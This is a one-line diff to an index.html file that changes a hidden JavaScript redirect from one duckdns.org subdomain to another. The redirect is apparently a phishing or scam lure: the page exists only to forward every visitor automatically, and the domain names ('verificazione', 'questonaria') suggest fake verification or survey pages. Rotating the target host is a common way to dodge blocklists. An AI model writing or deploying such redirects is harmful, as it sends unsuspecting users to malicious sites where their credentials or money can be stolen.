--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location = "https://verificazione.duckdns.org/r/kxKQRqS";</script>
+<script type="text/javascript">window.location = "https://questonaria.duckdns.org/r/kxKQRqS";</script>
